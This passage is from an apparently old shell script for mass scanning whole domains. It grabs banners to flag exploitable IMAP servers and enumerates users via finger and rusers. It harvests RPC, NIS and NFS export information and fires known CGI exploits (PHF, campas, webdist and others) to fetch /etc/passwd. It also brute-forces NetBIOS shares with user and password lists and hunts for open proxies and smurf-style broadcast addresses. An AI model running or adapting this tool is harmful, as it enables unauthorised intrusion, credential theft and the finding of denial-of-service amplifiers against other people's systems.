                   if ( cat $tmpdir/$siteprocess.imap4banner | grep "9.0" > /dev/null ) || ( cat $tmpdir/$siteprocess.imap4banner | grep "10.166 " > /dev/null ) || ( cat $tmpdir/$siteprocess.imap4banner | grep "10.171 " > /dev/null ) || ( cat $tmpdir/$siteprocess.imap4banner | grep "10.173 " > /dev/null ) || ( cat $tmpdir/$siteprocess.imap4banner | grep "10.190 " > /dev/null ) || ( cat $tmpdir/$siteprocess.imap4banner | grep "10.203 " > /dev/null ) || ( cat $tmpdir/$siteprocess.imap4banner | grep "10.205 " > /dev/null ) || ( cat $tmpdir/$siteprocess.imap4banner | grep "10.223 " > /dev/null )            
                     then
                         echo " " >> $scanDOMAIN.results
                         echo "Exploitable IMAP4 found on system" >> $scanDOMAIN.results
                         echo " " >> $scanDOMAIN.results
                   fi

                 fi

                 rm $tmpdir/$siteprocess.imap4banner
     
           fi

    fi
#---------------------------------------------------

#--------------FINGER
     if ( cat $tmpdir/portscan.temp | grep "79/tcp" > /dev/null ) && [ "$get_finger" = on ]
       then
           $fingerPATH @$siteprocess >> $tmpdir/$siteprocess.fingerinfo
           cp $tmpdir/$siteprocess.fingerinfo $tmpdir/finger.temp

           echo "Finger informations:" >> $scanDOMAIN.results
           echo " " >> $scanDOMAIN.results
           cat $tmpdir/$siteprocess.fingerinfo | grep -v "Permission denied" >> $scanDOMAIN.results
           echo " " >> $scanDOMAIN.results

           rm $tmpdir/$siteprocess.fingerinfo
           
           $fingerPATH -l root@$siteprocess >> $tmpdir/$siteprocess.fingerinfo

           cat $tmpdir/$siteprocess.fingerinfo | grep -v "Permission denied" | grep -v "no such user" >> $scanDOMAIN.results
           echo " " >> $scanDOMAIN.results

           rm $tmpdir/$siteprocess.fingerinfo

           $fingerPATH -l admin@$siteprocess >> $tmpdir/$siteprocess.fingerinfo

           cat $tmpdir/$siteprocess.fingerinfo | grep -v "Permission denied" | grep -v "no such user" >> $scanDOMAIN.results
           echo " " >> $scanDOMAIN.results

           rm $tmpdir/$siteprocess.fingerinfo

           cat $tmpdir/finger.temp | grep -v "$siteprocess" | grep -v "Login" | grep -v "No one logged on" | grep -v "Permission denied" | cut -d' ' --fields=-1 | uniq -i > $tmpdir/finger.temp2
           rm $tmpdir/finger.temp

           for ftemp in `cat $tmpdir/finger.temp2`
              do
                $fingerPATH -l $ftemp@$siteprocess > $tmpdir/finger.temp
                if ( ! cat $tmpdir/finger.temp | grep "no such user" > /dev/null )
                  then 
                      cat $tmpdir/finger.temp >> $scanDOMAIN.results
                      echo " " >> $scanDOMAIN.results
                fi

              rm $tmpdir/finger.temp
              done

     rm $tmpdir/finger.temp2
     fi
#---------------------------------------

#--------------RPC INFO
     if ( cat $tmpdir/portscan.temp | grep "111/tcp" > /dev/null ) && [ "$rpc_info" = on ]
       then
            $extrabinPATH/portscan -r $siteprocess > $tmpdir/$siteprocess.rpcinfo 2>/dev/null
            echo "Collected RPC services informations:" >> $scanDOMAIN.results
            echo " " >> $scanDOMAIN.results
            cat $tmpdir/$siteprocess.rpcinfo | grep -v "scanning host" >> $scanDOMAIN.results
            echo " " >> $scanDOMAIN.results
            
     fi
#----------------------------------------------

#--------------NIS MAPS

     if ( cat $tmpdir/portscan.temp | grep "111/tcp" > /dev/null ) && [ "$rpc_info" = on ] && ( cat $tmpdir/$siteprocess.rpcinfo | grep "yp" > /dev/null ) && [ "$nis_map" = on ]
       then
           $extrabinPATH/portscan -n $siteprocess > $tmpdir/$siteprocess.nisinfo 2>/dev/null
           echo "Collected NIS maps infromations:" >> $scanDOMAIN.results
           echo " " >> $scanDOMAIN.results
           cat $tmpdir/$siteprocess.nisinfo | grep -v "scanning host" >> $scanDOMAIN.results
           echo " " >> $scanDOMAIN.results

           rm $tmpdir/$siteprocess.nisinfo
     fi     

#-----------------------------------------------

#--------------REMOTEFS
     if ( cat $tmpdir/portscan.temp | grep "111/tcp" > /dev/null ) && [ "$remote_fs" = on ]
       then
           $showmountPATH -e $siteprocess > $tmpdir/$siteprocess.exports 2>/dev/null
           if [ -e $tmpdir/$siteprocess.exports ]
             then
                 if ( cat $tmpdir/$siteprocess.exports | grep "Export list" > /dev/null )
                   then
                       if ( cat $tmpdir/$siteprocess.exports | grep "everyone" > /dev/null ) || ( cat $tmpdir/$siteprocess.exports | grep "anon clnt" > /dev/null )
                         then
                             echo "* Found (everyone) exportable dirs on $siteprocess" >> $scanDOMAIN.results
                       fi
                 else
                     rm $tmpdir/$siteprocess.exports
                 fi
           fi
                
           if [ -e $tmpdir/$siteprocess.exports ]
             then
                 echo "Exportable directories:" >> $scanDOMAIN.results
                 cat $tmpdir/$siteprocess.exports | grep -v "Export list" >> $scanDOMAIN.results
                 echo " " >> $scanDOMAIN.results  
           fi
     
           if [ -e $tmpdir/$siteprocess.exports ]
             then
                 rm $tmpdir/$siteprocess.exports
           fi
    
     fi     

#--------------BIND STUFF
     if ( cat $tmpdir/portscan.temp | grep "53/tcp" > /dev/null )
       then
           if [ "$bind_ver" = on ]
             then
                 echo "BIND version informations:" >> $scanDOMAIN.results

                 $extrabinPATH/bindinfo $siteprocess >> $scanDOMAIN.results 2>/dev/null
                 echo " " >> $scanDOMAIN.results

           fi

           if [ "$bind_exploit" = on ]
             then
                 echo "BIND vulnerability informations:" >> $scanDOMAIN.results 

                 $extrabinPATH/bindvuln $siteprocess >> $scanDOMAIN.results 2>/dev/null
                 echo " " >> $scanDOMAIN.results
           fi
      fi
#-------------------------------------------------

#--------------RUSERS COLLECT INFO
     if [ "$rusers_scan" = on ] && [ "$rpc_info" = on ] && ( cat $tmpdir/portscan.temp | grep "111/tcp" > /dev/null )
       then
           if ( cat $tmpdir/$siteprocess.rpcinfo | grep "rusers" > /dev/null ) || ( cat $tmpdir/$siteprocess.rpcinfo | grep "RUSERS" > /dev/null )
             then
                 $rusersPATH -la $siteprocess > $tmpdir/$siteprocess.ruserstemp
                 echo "Collected RUSERS informations:" >> $scanDOMAIN.results
                 echo " " >> $scanDOMAIN.results
                 cat $tmpdir/$siteprocess.ruserstemp >> $scanDOMAIN.results
                 echo " " >> $scanDOMAIN.results
                 rm $tmpdir/$siteprocess.ruserstemp
           fi
     fi
#---------------------------------------------------------

#--------------CGI
     if ( cat $tmpdir/portscan.temp | grep "80/tcp" > /dev/null ) &&  [ "$cgi_scan" = on ]
       then

           echo "CGI scanning informations:" >> $scanDOMAIN.results
           echo " " >> $scanDOMAIN.results

           $lynxPATH -dump http://$siteprocess$testcgi > $tmpdir/$siteprocess.cgitemp
           echo "TEST CGI (if present) listing for cgi-bin directory" >> $scanDOMAIN.results
           echo " " >> $scanDOMAIN.results
           cat $tmpdir/$siteprocess.cgitemp >> $scanDOMAIN.results
           echo " " >> $scanDOMAIN.results
           rm $tmpdir/$siteprocess.cgitemp

           $lynxPATH -dump http://$siteprocess$nphtestcgi > $tmpdir/$siteprocess.cgitemp
           echo "NPH TEST CGI (if present) listing for cgi-bin directory" >> $scanDOMAIN.results
           echo " " >> $scanDOMAIN.results
           cat $tmpdir/$siteprocess.cgitemp >> $scanDOMAIN.results
           echo " " >> $scanDOMAIN.results
           rm $tmpdir/$siteprocess.cgitemp
           
           $lynxPATH -dump http://$siteprocess$phf > $tmpdir/$siteprocess.cgitemp

               if cat $tmpdir/$siteprocess.cgitemp | grep root:
                 then
                     echo "Got possibile passwd file from $siteprocess using PHF" >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     cat $tmpdir/$siteprocess.cgitemp >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     rm $tmpdir/$siteprocess.cgitemp

           else

               rm $tmpdir/$siteprocess.cgitemp
               $lynxPATH -dump http://$siteprocess$php > $tmpdir/$siteprocess.cgitemp
               
               if cat $tmpdir/$siteprocess.cgitemp | grep root:
                 then
                     echo "Got possible passwd file from $siteprocess using PHP" >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     cat $tmpdir/$siteprocess.cgitemp >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     rm $tmpdir/$siteprocess.cgitemp

           else
               rm $tmpdir/$siteprocess.cgitemp
               $lynxPATH -dump http://$siteprocess$webdist > $tmpdir/$siteprocess.cgitemp

               if cat $tmpdir/$siteprocess.cgitemp | grep root:
                 then
                     echo "Got possible passwd file from $siteprocess using WEBDIST" >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     cat $tmpdir/$siteprocess.cgitemp >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     rm $tmpdir/$siteprocess.cgitemp
                             

           else
               rm $tmpdir/$siteprocess.cgitemp
               $lynxPATH -dump http://$siteprocess$campas > $tmpdir/$siteprocess.cgitemp

               if cat $tmpdir/$siteprocess.cgitemp | grep root:
                 then
                     echo "Got possible passwd file from $siteprocess using CAMPAS" >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     cat $tmpdir/$siteprocess.cgitemp >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     rm $tmpdir/$siteprocess.cgitemp

           else
               rm $tmpdir/$siteprocess.cgitemp
               $lynxPATH -dump http://$siteprocess$phfyp > $tmpdir/$siteprocess.cgitemp

               if cat $tmpdir/$siteprocess.cgitemp | grep root:
                 then
                     echo "Got possible passwd file from $siteprocess using PHF and YPCAT" >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     cat $tmpdir/$siteprocess.cgitemp >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     rm $tmpdir/$siteprocess.cgitemp

           else
               rm $tmpdir/$siteprocess.cgitemp
               $lynxPATH -dump http://$siteprocess$query > $tmpdir/$siteprocess.cgitemp

               if cat $tmpdir/$siteprocess.cgitemp | grep root:
                 then
                     echo "Got possible passwd file from $siteprocess using QUERY" >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     cat $tmpdir/$siteprocess.cgitemp >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     rm $tmpdir/$siteprocess.cgitemp

           else
               rm $tmpdir/$siteprocess.cgitemp
    
         fi
         fi
         fi
         fi
         fi
         fi

    fi
#------------------------------------------

#--------------NETBIOS

     if ( cat $tmpdir/portscan.temp | grep "139/tcp" > /dev/null ) && [ "$netbios_scan" = on ]
       then
           echo "Shared NETBIOS resources:" >> $scanDOMAIN.results
           echo " " >> $scanDOMAIN.results

           $extrabinPATH/nat -o $tmpdir/$siteprocess.shared -u ./userlist.nat -p ./passlist.nat $siteprocess > /dev/null
        
           cat $tmpdir/$siteprocess.shared >> $scanDOMAIN.results
           echo " " >> $scanDOMAIN.results

           rm $tmpdir/$siteprocess.shared
     fi
#--------------------------------------------

    if ( cat $tmpdir/portscan.temp | grep "1080/tcp" > /dev/null )
      then
          echo "Maybe a SOCKS FIREWALL (port 1080 open) is on the machine" >> $scanDOMAIN.results
          echo " " >> $scanDOMAIN.results
    fi

     echo "$siteprocess" >> $scanDOMAIN.done

     if ( cat $tmpdir/portscan.temp | grep "111/tcp" > /dev/null ) && [ "$rpc_info" = on ]
       then
           rm $tmpdir/$siteprocess.rpcinfo
     fi

    rm $tmpdir/portscan.temp

   done

echo " "
echo "* Main scan finished"

if [ "$wingate_scan" = on ] || [ "$bcast_scan" = on ]
  then
      if [ "$wingate_scan" = on ] && [ ! "$singleisON" = on ]
        then
            echo "* Scanning for open Wingates, sockets or Netproxies"

            echo "Wingates, sockets or Netproxies in $scanDOMAIN:" >> $scanDOMAIN.results
            echo " " >> $scanDOMAIN.results

            $nohupPATH $extrabinPATH/wgate $mainLISTwgatez $tmpdir/$mainLISTwgatez.wingates > /dev/null

            cat $tmpdir/$mainLIST.wingates | grep -v "Wingate Seeker by KByte" | grep -v "List of wingates" >> $scanDOMAIN.results
            echo " " >> $scanDOMAIN.results     
     
            rm $tmpdir/$mainLIST.wingates
      fi

      if [ "$bcast_scan" = on  ] && [ ! "$singleis" = on ]
        then
            echo "* Scanning for broadcasts"

            echo "Scanning for valid broadcasts in domain" >> $scanDOMAIN.results
            echo " " >> $scanDOMAIN.results

            for bscan in `cat $mainLISTwgatez`
               do
                 echo "$bscan" | cut -d'.' --fields=-3 >> $tmpdir/bscan.temp
               done

            sort $tmpdir/bscan.temp > $tmpdir/bscan.temp1
            rm $tmpdir/bscan.temp
            uniq -i $tmpdir/bscan.temp1 > $tmpdir/bscan.temp
            rm $tmpdir/bscan.temp1

            if ( cat $tmpdir/bscan.temp | grep [a-z] > /dev/null )
              then
                  echo "* Filtering out non-dotted quad IPs..."
                  cat $tmpdir/bscan.temp | grep -v [a-z] > $tmpdir/bscan.temp1
                  rm $tmpdir/bscan.temp
                  mv $tmpdir/bscan.temp1 $tmpdir/bscan.temp
            fi



            if [ ! -e $tmpdir/bscan.temp ] || [ ! -s $tmpdir/bscan.temp ]
              then
                  echo "* Filtered file does not contain dotted quad IPs... skipping"
                  rm $tmpdir/bscan.temp 2>/dev/null
            else

                for bping in `cat $tmpdir/bscan.temp`
                   do
                     $pingPATH -c 2 $bping.255 > $tmpdir/bcast.restemp 2>/dev/null
                     if ( cat $tmpdir/bcast.restemp | grep "duplicates" > /dev/null )
                       then
                           echo -n "[Broadcast $bping.255]" >> $scanDOMAIN.results
                           cat $tmpdir/bcast.restemp | grep duplicates | cut -d',' --fields=3 >> $scanDOMAIN.results
                           echo " " >> $scanDOMAIN.results
                     fi
                     rm $tmpdir/bcast.restemp 
 
                     $pingPATH -c 2 $bping.0 > $tmpdir/bcast.restemp 2>/dev/null
                     if ( cat $tmpdir/bcast.restemp | grep "duplicates" > /dev/null )
                       then
                           echo -n "[Broadcast $bping.0]" >> $scanDOMAIN.results
                           cat $tmpdir/bcast.restemp | grep duplicates | cut -d',' --fields=3 >> $scanDOMAIN.results
                           echo " " >> $scanDOMAIN.results
                     fi
                     rm $tmpdir/bcast.restemp

                   done

                   rm $tmpdir/bscan.temp
            fi  
      fi
fi

# -------- PLUGINS ON GLOBAL LIST -------------

if [ "$use_plugins" = on ] && [ -e $tmpdir/plugins.listrun ]
  then
      echo " "
      echo "* Running plugins on the main ip list"
      echo " "

      for execplugin in `cat $tmpdir/plugins.listrun`
         do
           plugFILE=`cat $tmpdir/$execplugin.plugin | grep "_file" | cut -d'=' --fields=2`
           plugPARAMS=`cat $tmpdir/$execplugin.plugin | grep "_params" | cut -d'=' --fields=2`
           plugLEVEL=`cat $tmpdir/$execplugin.plugin | grep "_level" | cut -d'=' --fields=2`

           if [ "$plugLEVEL" = $userTYPE ]
             then
                 echo "$plugPARAMS" >> $tmpdir/plugparams.temp 

                 echo -n "$pluginsDIR" >> $tmpdir/plugin.tempcommandline
                 echo -n "/" >> $tmpdir/plugin.tempcommandline
                 echo -n "$plugFILE" >> $tmpdir/plugin.tempcommandline
                 echo -n " " >> $tmpdir/plugin.tempcommandline

                 for pluginparameter in `cat $tmpdir/plugparams.temp`
                    do
                      if [ "$pluginparameter" = completeLIST ]
                        then
                            echo -n "$mainLIST" >> $tmpdir/plugin.tempcommandline
               
                      elif [ "$pluginparameter" = currentHOST ]
                          then
                              echo -n "$siteprocess" >> $tmpdir/plugin.tempcommandline

                      elif [ "$pluginparameter" = resultsFILE ]
                          then
                              echo -n "$scanDOMAIN.results" >> $tmpdir/plugin.tempcommandline

                      elif [ "$pluginparameter" = pluginsDIRECTORY ]
                          then
                              echo -n "$pluginsDIR" >> $tmpdir/plugin.tempcommandline

                      elif [ "$pluginparameter" = temporaryDIR ]
                          then
                              echo -n "$tmpdir" >> $tmpdir/plugin.tempcommandline

                      elif [ "$pluginparameter" = completeIPLIST ]
                          then
                              echo -n "$mainLISTip" >> $tmpdir/plugin.tempcommandline

                      else
                          echo -n "$pluginparameter" >> $tmpdir/plugin.tempcommandline

                      fi
 
                      echo -n " " >> $tmpdir/plugin.tempcommandline

                    done

                 pluginEXEC=`cat $tmpdir/plugin.tempcommandline`

                 ( . $pluginEXEC )

                 rm $tmpdir/plugparams.temp
                 rm $tmpdir/plugin.tempcommandline
        
           fi

         done
fi

#--------------------------------------

rm $scanDOMAIN.done
rm $scanDOMAIN.resume

if [ -e $scanDOMAIN.resumelist ]
  then
      rm $scanDOMAIN.resumelist
fi

echo -n "Scan finished on: " >> $scanDOMAIN.results
date >> $scanDOMAIN.results
echo " " >> $scanDOMAIN.results

if [ "$tar_results" = on ]
  then
      echo -n "Creating .TAR.GZ archive of the results... "      
      $tarPATH --create --gzip --file $scanDOMAIN.tar.gz $scanDOMAIN.*
      echo "done"
fi

# -------- PLUGINS CONFIGURED AS 'POST' -------------

if [ "$use_plugins" = on ] && [ -e $tmpdir/plugins.postrun ]
  then
      echo " "
      echo "* Running plugins at the end of scan"
      echo " "

      for execplugin in `cat $tmpdir/plugins.postrun`
         do
           plugFILE=`cat $tmpdir/$execplugin.plugin | grep "_file" | cut -d'=' --fields=2`
           plugPARAMS=`cat $tmpdir/$execplugin.plugin | grep "_params" | cut -d'=' --fields=2`
           plugLEVEL=`cat $tmpdir/$execplugin.plugin | grep "_level" | cut -d'=' --fields=2`

           if [ "$plugLEVEL" = $userTYPE ]
             then
                 echo "$plugPARAMS" >> $tmpdir/plugparams.temp 

                 echo -n "$pluginsDIR" >> $tmpdir/plugin.tempcommandline
                 echo -n "/" >> $tmpdir/plugin.tempcommandline
                 echo -n "$plugFILE" >> $tmpdir/plugin.tempcommandline
                 echo -n " " >> $tmpdir/plugin.tempcommandline

                 for pluginparameter in `cat $tmpdir/plugparams.temp`
                    do
                      if [ "$pluginparameter" = completeLIST ]
                        then
                            echo -n "$mainLIST" >> $tmpdir/plugin.tempcommandline
               
                      elif [ "$pluginparameter" = currentHOST ]
                          then
                              echo -n "$siteprocess" >> $tmpdir/plugin.tempcommandline

                      elif [ "$pluginparameter" = resultsFILE ]
                          then
                              echo -n "$scanDOMAIN.results" >> $tmpdir/plugin.tempcommandline

                      elif [ "$pluginparameter" = pluginsDIRECTORY ]
                          then
                              echo -n "$pluginsDIR" >> $tmpdir/plugin.tempcommandline

                      elif [ "$pluginparameter" = temporaryDIR ]
                          then
                              echo -n "$tmpdir" >> $tmpdir/plugin.tempcommandline

                      elif [ "$pluginparameter" = completeIPLIST ]
                          then
                              echo -n "$mainLISTip" >> $tmpdir/plugin.tempcommandline

                      else
                          echo -n "$pluginparameter" >> $tmpdir/plugin.tempcommandline

                      fi
 
                      echo -n " " >> $tmpdir/plugin.tempcommandline

                    done

                 pluginEXEC=`cat $tmpdir/plugin.tempcommandline`

                 ( . $pluginEXEC )

                 rm $tmpdir/plugparams.temp
                 rm $tmpdir/plugin.tempcommandline
        
           fi

         done

fi

# ---------------------------------------------------

rm -rf $tmpdir

echo -e "\a"

echo "* Results saved in file $scanDOMAIN.results"
echo "* --- All done! sWEETM+NT rulez ---"
echo " "